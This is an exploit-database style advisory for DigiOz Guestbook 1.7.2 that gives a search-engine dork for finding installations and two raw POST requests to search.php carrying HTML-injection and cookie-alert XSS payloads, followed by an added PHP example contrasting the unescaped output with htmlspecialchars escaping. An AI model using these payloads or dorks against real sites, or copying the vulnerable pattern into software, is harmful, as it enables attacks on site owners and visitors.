
DigiOz Guestbook Version 1.7.2 Multiple Vulnerabilities

Author: AtT4CKxT3rR0r1ST , Published: 10-06-2013

####################################################################
.:. Author : AtT4CKxT3rR0r1ST
.:. Contact : [F.Hack@w.cn] , [AtT4CKxT3rR0r1ST@gmail.com]
.:. Home : http://www.iphobos.com/blog/
.:. Script : http://www.digioz.com/
.:. Dork : "DigiOz Guestbook Version 1.7.2"
.:.        intitle:"Powered by DigiOz Guestbook Version 1.7.2"
####################################################################

===[ Exploit ]===

POST HTML Injection:
====================

POST /search.php HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.site.com/search.php
Cookie: PHPSESSID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 40
search_term=<h1>INJECTION</h1>


POST Cross-Site Scripting:
==========================

POST /search.php HTTP/1.1
Host: www.site.com
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://www.site.com/search.php
Cookie: PHPSESSID=
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
search_term=<script>alert(document.cookie)</script>
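
Both requests above hit the same sink: search.php reflects the submitted search_term into the response without escaping it. The following PHP is an added example written for this page, not DigiOz Guestbook code. It shows that vulnerable pattern next to a hardened version of the same output; the function names (render_results_vulnerable, render_results_safe, h, normalize_search_term) and the inline sample inputs are assumptions constructed here to mirror the advisory's two requests.

```php
<?php
// Added example, not from DigiOz Guestbook. Assumed helper names.

// Vulnerable pattern: the POSTed search term is concatenated straight into
// the HTML response. Markup such as <h1>…</h1> or <script>…</script> in
// search_term is therefore rendered as markup (HTML injection / reflected XSS).
function render_results_vulnerable(string $term): string
{
    return "<p>Search results for: " . $term . "</p>";
}

// Hardened pattern: escape on output for the HTML text context.
// ENT_QUOTES also escapes single quotes, so the same helper is safe inside
// quoted attribute values; an explicit charset avoids multi-byte ambiguity.
function h(string $s): string
{
    return htmlspecialchars($s, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}

function render_results_safe(string $term): string
{
    return "<p>Search results for: " . h($term) . "</p>";
}

// Optional second layer: bound the term length and drop control characters
// before the value reaches the search backend. This is input validation and
// does not replace output escaping, which is what actually closes the bug.
function normalize_search_term(?string $raw): string
{
    $term = trim((string) $raw);
    if ($term === '' || strlen($term) > 100 || preg_match('/[\x00-\x1F\x7F]/', $term)) {
        return '';
    }
    return $term;
}

// In the real handler the value would come from $_POST['search_term'];
// here the two payloads from the advisory are constructed inline.
$inputs = [
    '<h1>INJECTION</h1>',
    '<script>alert(document.cookie)</script>',
];

foreach ($inputs as $in) {
    $term = normalize_search_term($in);
    echo "vulnerable: ", render_results_vulnerable($term), PHP_EOL;
    echo "hardened:   ", render_results_safe($term), PHP_EOL;
}
```

Run with the PHP CLI (`php example.php`): the vulnerable lines echo the tags verbatim, while the hardened lines emit `&lt;h1&gt;` and `&lt;script&gt;` entities, so a browser displays the search term as text instead of executing it. Escaping at the output point is the fix to apply in search.php; a Content-Security-Policy header that disallows inline script is a reasonable defence-in-depth addition but does not remove the injection itself.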

####################################################################
